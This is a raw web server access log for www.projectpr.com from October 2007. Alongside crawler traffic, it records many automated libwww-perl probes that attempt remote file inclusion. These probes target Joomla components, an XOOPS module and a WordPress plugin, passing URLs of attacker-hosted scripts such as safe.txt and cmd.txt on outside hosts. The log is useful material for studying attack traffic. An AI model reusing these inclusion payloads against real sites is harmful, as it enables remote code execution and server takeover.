200.83.4.4 - - [11/Oct/2007:17:08:51 -0700] "GET /logs/access.log HTTP/1.1" 200 851968 "http://www.projectpr.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.projectpr.com"
203.69.39.251 - - [11/Oct/2007:17:08:52 -0700] "GET /logs/access.log HTTP/1.1" 200 0 "http://www.projectpr.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.projectpr.com"
200.83.4.4 - - [11/Oct/2007:17:08:53 -0700] "GET /logs/access.log HTTP/1.1" 200 0 "http://www.projectpr.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.projectpr.com"
89.0.98.252 - - [11/Oct/2007:17:09:58 -0700] "GET http://www.projectpr.com/logs/access.log HTTP/1.0" 200 602 "http://www.projectpr.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.projectpr.com"
89.0.98.252 - - [11/Oct/2007:17:09:59 -0700] "GET / HTTP/1.0" 200 9521 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.projectpr.com"
89.0.98.252 - - [11/Oct/2007:17:10:00 -0700] "GET / HTTP/1.0" 200 9521 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.projectpr.com"
193.135.134.225 - - [11/Oct/2007:17:42:25 -0700] "GET /logs/access_070712.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 329 "-" "libwww-perl/5.808" "www.projectpr.com"
193.135.134.225 - - [11/Oct/2007:17:42:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
193.135.134.225 - - [11/Oct/2007:17:42:26 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
202.123.165.206 - - [11/Oct/2007:18:25:58 -0700] "GET /logs/access_070712.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 329 "-" "libwww-perl/5.803" "www.projectpr.com"
202.123.165.206 - - [11/Oct/2007:18:25:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
202.123.165.206 - - [11/Oct/2007:18:25:59 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
74.6.23.107 - - [11/Oct/2007:19:33:08 -0700] "GET /logs/?N=D HTTP/1.0" 200 4068 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
65.54.165.38 - - [11/Oct/2007:20:20:35 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
65.54.165.38 - - [11/Oct/2007:20:20:35 -0700] "GET / HTTP/1.0" 200 9521 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
84.55.177.32 - - [11/Oct/2007:22:22:59 -0700] "GET /logs/access_070712.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsclan.eu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
84.55.177.32 - - [11/Oct/2007:22:23:00 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsclan.eu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
84.55.177.32 - - [11/Oct/2007:22:23:00 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsclan.eu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
72.21.54.122 - - [11/Oct/2007:22:23:06 -0700] "GET /logs/access_070712.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsclan.eu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.21.54.122 - - [11/Oct/2007:22:23:06 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsclan.eu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.21.54.122 - - [11/Oct/2007:22:23:06 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsclan.eu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
84.55.177.32 - - [11/Oct/2007:22:23:17 -0700] "GET /logs/access_070712.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsclan.eu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
84.55.177.32 - - [11/Oct/2007:22:23:18 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsclan.eu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
84.55.177.32 - - [11/Oct/2007:22:23:18 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsclan.eu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
69.33.25.146 - - [11/Oct/2007:22:34:18 -0700] "GET /logs/access_070612.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://iid.yc.ac.kr/bbs//skin/zero_vote/images/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
69.33.25.146 - - [11/Oct/2007:22:34:19 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://iid.yc.ac.kr/bbs//skin/zero_vote/images/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
69.33.25.146 - - [11/Oct/2007:22:34:19 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://iid.yc.ac.kr/bbs//skin/zero_vote/images/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.6.19.124 - - [11/Oct/2007:22:36:37 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.27.70 - - [11/Oct/2007:22:36:37 -0700] "GET /navigation_bars/ HTTP/1.0" 200 807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.26.141 - - [12/Oct/2007:01:23:31 -0700] "GET /navigation_bars/ HTTP/1.0" 200 807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
81.19.67.14 - - [12/Oct/2007:02:29:13 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "StackRambler/2.0 (MSIE incompatible)" "www.projectpr.com"
74.52.73.210 - - [12/Oct/2007:02:53:16 -0700] "GET //administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://teologia.freehostia.com/pspuma/pm/style/allindo.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
88.191.15.152 - - [12/Oct/2007:02:56:41 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.805" "www.projectpr.com"
209.35.191.105 - - [12/Oct/2007:03:08:12 -0700] "GET //administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://manxdate.com/id_img/about.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
74.52.73.210 - - [12/Oct/2007:03:10:47 -0700] "GET /logs/access_070712.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://teologia.freehostia.com/pspuma/pm/style/allindo.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.73.210 - - [12/Oct/2007:03:10:48 -0700] "GET /logs//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://teologia.freehostia.com/pspuma/pm/style/allindo.gif? HTTP/1.1" 404 336 "-" "libwww-perl/5.808" "www.projectpr.com"
212.241.251.41 - - [12/Oct/2007:03:15:37 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.kalinovka.com/files/thumbs/safe.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.23.221 - - [12/Oct/2007:03:32:04 -0700] "GET /tmp?D=A HTTP/1.0" 301 80 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.23.221 - - [12/Oct/2007:03:32:04 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
212.241.251.41 - - [12/Oct/2007:03:34:16 -0700] "GET /logs/access_070712.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.kalinovka.com/files/thumbs/safe.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.805" "www.projectpr.com"
212.241.251.41 - - [12/Oct/2007:03:34:16 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.kalinovka.com/files/thumbs/safe.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.50.237 - - [12/Oct/2007:03:47:03 -0700] "GET /logs/access_%3Cwbr%20/%3E070712.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://reklama.vltrakt.ru/robots.txt? HTTP/1.1" 404 367 "-" "libwww-perl/5.803" "www.projectpr.com"
87.106.50.237 - - [12/Oct/2007:03:47:04 -0700] "GET //administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://reklama.vltrakt.ru/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.106.50.237 - - [12/Oct/2007:03:47:04 -0700] "GET /logs/access_%3Cwbr%20//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://reklama.vltrakt.ru/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
74.6.24.154 - - [12/Oct/2007:03:52:22 -0700] "GET /logs/?M=A HTTP/1.0" 200 4068 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.28.107 - - [12/Oct/2007:04:24:32 -0700] "GET /navigation_bars/ HTTP/1.0" 200 807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
72.29.74.145 - - [12/Oct/2007:04:51:01 -0700] "GET /logs/access_070712.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.29.74.145 - - [12/Oct/2007:04:51:01 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.29.74.145 - - [12/Oct/2007:04:51:02 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 279 "-" "libwww-perl/5.808" "www.projectpr.com"
72.36.233.242 - - [12/Oct/2007:04:51:36 -0700] "GET /logs/access_070712.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 297 "-" "libwww-perl/5.808" "www.projectpr.com"
72.36.233.242 - - [12/Oct/2007:04:51:36 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.36.233.242 - - [12/Oct/2007:04:51:36 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 279 "-" "libwww-perl/5.808" "www.projectpr.com"
87.230.22.213 - - [12/Oct/2007:04:53:20 -0700] "GET /logs/access_070712.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.230.22.213 - - [12/Oct/2007:04:53:20 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 274 "-" "libwww-perl/5.803" "www.projectpr.com"
87.230.22.213 - - [12/Oct/2007:04:53:21 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
67.173.191.235 - - [12/Oct/2007:04:53:44 -0700] "GET /logs/access_070712.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
67.173.191.235 - - [12/Oct/2007:04:53:45 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
67.173.191.235 - - [12/Oct/2007:04:53:45 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
169.207.64.5 - - [12/Oct/2007:04:54:52 -0700] "GET /logs/access_070712.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
169.207.64.5 - - [12/Oct/2007:04:54:52 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
169.207.64.5 - - [12/Oct/2007:04:54:52 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
204.213.246.61 - - [12/Oct/2007:04:58:12 -0700] "GET /logs/access_070712.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
204.213.246.61 - - [12/Oct/2007:04:58:12 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
204.213.246.61 - - [12/Oct/2007:04:58:12 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 279 "-" "libwww-perl/5.79" "www.projectpr.com"
221.186.115.114 - - [12/Oct/2007:04:59:52 -0700] "GET /logs/access_070712.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
221.186.115.114 - - [12/Oct/2007:04:59:52 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
221.186.115.114 - - [12/Oct/2007:04:59:53 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
62.141.39.43 - - [12/Oct/2007:05:01:56 -0700] "GET /logs/access_070712.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
62.141.39.43 - - [12/Oct/2007:05:01:57 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
62.141.39.43 - - [12/Oct/2007:05:01:58 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
216.246.99.64 - - [12/Oct/2007:05:26:36 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.246.99.64 - - [12/Oct/2007:05:36:15 -0700] "GET /logs/access_070712.log/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.246.99.64 - - [12/Oct/2007:05:36:15 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.6.26.120 - - [12/Oct/2007:06:05:05 -0700] "GET /clipart/ HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
24.39.209.148 - - [12/Oct/2007:06:25:39 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
24.39.209.148 - - [12/Oct/2007:06:25:40 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://manxdate.com/id_img/about.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
24.39.209.148 - - [12/Oct/2007:07:20:16 -0700] "GET /logs/access_070712.log/components/com_simpleboard/image_upload.php?sbp=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
24.39.209.148 - - [12/Oct/2007:07:20:16 -0700] "GET /logs/access_070712.log/components/com_simpleboard/image_upload.php?sbp=http://manxdate.com/id_img/about.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
24.39.209.148 - - [12/Oct/2007:07:20:22 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
24.39.209.148 - - [12/Oct/2007:07:20:22 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://manxdate.com/id_img/about.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.12.45.22 - - [12/Oct/2007:07:20:24 -0700] "GET / HTTP/1.0" 200 9521 "-" "Mozilla/2.0 (compatible; MSIE 3.0B; Windows NT)" "www.projectpr.com"
71.195.238.232 - - [12/Oct/2007:08:23:27 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pizza-celentano.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.6.19.124 - - [12/Oct/2007:10:37:50 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.20.151 - - [12/Oct/2007:10:37:51 -0700] "GET /clipart/?N=A HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
71.195.238.232 - - [12/Oct/2007:10:46:00 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pizza-celentano.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
71.195.238.232 - - [12/Oct/2007:10:59:25 -0700] "GET /logs/access_070712.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pizza-celentano.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
71.195.238.232 - - [12/Oct/2007:10:59:26 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pizza-celentano.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
217.65.240.14 - - [12/Oct/2007:11:00:18 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pizza-celentano.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
74.6.24.15 - - [12/Oct/2007:11:00:26 -0700] "GET /clipart/?D=D HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
217.65.240.14 - - [12/Oct/2007:11:22:01 -0700] "GET /logs/access_070712.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pizza-celentano.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.65.240.14 - - [12/Oct/2007:11:22:02 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pizza-celentano.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
211.239.157.23 - - [12/Oct/2007:11:26:06 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.79" "www.projectpr.com"
74.6.23.214 - - [12/Oct/2007:11:45:16 -0700] "GET /logs/access_061012.log HTTP/1.0" 200 540177 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
211.239.157.23 - - [12/Oct/2007:11:51:22 -0700] "GET /logs/access_070712.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.239.157.23 - - [12/Oct/2007:11:51:24 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
207.46.98.36 - - [12/Oct/2007:12:14:01 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
207.46.98.36 - - [12/Oct/2007:12:14:01 -0700] "GET /services.html HTTP/1.0" 200 9658 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
75.189.125.137 - - [12/Oct/2007:12:30:02 -0700] "GET / HTTP/1.1" 200 9521 "http://search.yahoo.com/search?p=project%20pr&ei=UTF-8" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6" "www.projectpr.com"
75.189.125.137 - - [12/Oct/2007:12:30:02 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6" "www.projectpr.com"
75.189.125.137 - - [12/Oct/2007:12:30:02 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6" "www.projectpr.com"
75.189.125.137 - - [12/Oct/2007:12:30:02 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6" "www.projectpr.com"
75.189.125.137 - - [12/Oct/2007:12:30:03 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6" "www.projectpr.com"
75.189.125.137 - - [12/Oct/2007:12:30:03 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6" "www.projectpr.com"
75.189.125.137 - - [12/Oct/2007:12:30:03 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6" "www.projectpr.com"
75.189.125.137 - - [12/Oct/2007:12:30:03 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6" "www.projectpr.com"
75.189.125.137 - - [12/Oct/2007:12:30:03 -0700] "GET /images/promo_mail.gif HTTP/1.1" 200 1469 "http://www.projectpr.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6" "www.projectpr.com"
75.189.125.137 - - [12/Oct/2007:12:30:03 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6" "www.projectpr.com"
206.225.86.155 - - [12/Oct/2007:12:40:05 -0700] "GET /logs/access_070712.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
206.225.86.155 - - [12/Oct/2007:12:40:05 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
206.225.86.155 - - [12/Oct/2007:12:40:05 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
206.225.86.155 - - [12/Oct/2007:12:41:39 -0700] "GET /logs/access_070612.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
72.29.74.145 - - [12/Oct/2007:12:46:17 -0700] "GET /logs/access_070712.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.29.74.145 - - [12/Oct/2007:12:46:17 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.29.74.145 - - [12/Oct/2007:12:46:18 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.29.74.145 - - [12/Oct/2007:12:47:50 -0700] "GET /logs/access_070612.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
206.225.86.155 - - [12/Oct/2007:12:48:59 -0700] "GET /logs/access_070712.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
206.225.86.155 - - [12/Oct/2007:12:48:59 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
